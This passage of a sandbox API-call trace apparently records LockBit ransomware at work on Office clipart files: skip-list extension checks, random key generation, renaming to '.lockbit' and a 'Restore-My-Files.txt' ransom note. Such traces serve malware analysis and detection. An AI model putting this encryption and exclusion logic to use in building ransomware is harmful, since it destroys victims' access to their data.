(lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.731] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.731] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.732] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152600.WMF") returned 1 [0144.732] lstrcmpiW (lpString1="ntldr", lpString2="J0152600.WMF") returned 1 [0144.732] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152600.WMF") returned 1 [0144.732] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152600.WMF") returned -1 [0144.733] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152600.WMF") returned -1 [0144.733] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152600.WMF") returned 1 [0144.733] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152600.WMF") returned -1 [0144.733] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.733] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned=".WMF" [0144.733] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.733] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.733] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.733] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.733] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.733] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.733] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.733] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.733] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.733] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.733] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.733] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.733] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.733] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.733] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.734] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.734] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.734] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.734] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.734] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.734] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.734] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.734] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.734] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.734] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.734] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.734] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.734] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.734] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF.lockbit") returned 72 [0144.734] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152600.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0144.735] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.735] malloc (_Size=0x40068) returned 0x3e70008 [0144.735] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=9768) returned 1 [0144.736] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.736] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0144.736] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.737] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0144.737] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0144.743] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.743] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.743] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.744] free (_Block=0x1fa2ed8) [0144.744] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.744] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.744] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.745] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5642c4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1884, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152602.WMF", cAlternateFileName="")) returned 1 [0144.745] lstrcmpiW (lpString1=".", lpString2="J0152602.WMF") returned -1 [0144.745] lstrcmpiW (lpString1="..", lpString2="J0152602.WMF") returned -1 [0144.745] PathFindExtensionW (pszPath="J0152602.WMF") returned=".WMF" [0144.745] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.745] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.746] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.746] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.747] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.747] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.747] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.747] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.747] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.747] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.747] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.747] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.747] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.747] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.747] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.747] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152602.WMF") returned 1 [0144.747] lstrcmpiW (lpString1="ntldr", lpString2="J0152602.WMF") returned 1 [0144.747] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152602.WMF") returned 1 [0144.747] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152602.WMF") returned -1 [0144.747] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152602.WMF") returned -1 [0144.747] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152602.WMF") returned 1 [0144.747] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152602.WMF") returned -1 [0144.747] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.747] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned=".WMF" [0144.747] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.748] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.748] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.749] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.749] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.749] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.749] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.749] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.749] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF.lockbit") returned 72 [0144.749] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152602.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0144.750] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.750] malloc (_Size=0x40068) returned 0x3ef0008 [0144.750] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=6276) returned 1 [0144.750] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.751] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0144.751] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.751] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0144.752] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0144.757] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.757] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.757] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.759] free (_Block=0x1fa2ed8) [0144.759] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.759] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.759] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.759] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56452630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x40f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152606.WMF", cAlternateFileName="")) returned 1 [0144.759] lstrcmpiW (lpString1=".", lpString2="J0152606.WMF") returned -1 [0144.759] lstrcmpiW (lpString1="..", lpString2="J0152606.WMF") returned -1 [0144.759] PathFindExtensionW (pszPath="J0152606.WMF") returned=".WMF" [0144.759] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.759] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.759] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.760] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.761] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.761] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.762] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.762] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.762] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.762] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.762] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152606.WMF") returned 1 [0144.762] lstrcmpiW (lpString1="ntldr", lpString2="J0152606.WMF") returned 1 [0144.762] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152606.WMF") returned 1 [0144.762] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152606.WMF") returned -1 [0144.762] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152606.WMF") returned -1 [0144.762] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152606.WMF") returned 1 [0144.762] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152606.WMF") returned -1 [0144.762] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.762] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned=".WMF" [0144.762] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.762] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.762] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.762] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.762] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.762] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.763] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.764] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.764] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.764] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.764] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF.lockbit") returned 72 [0144.764] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152606.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.769] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.769] malloc (_Size=0x40068) returned 0x1ff1e60 [0144.770] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=16632) returned 1 [0144.770] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.770] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0144.770] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.771] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0144.771] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, 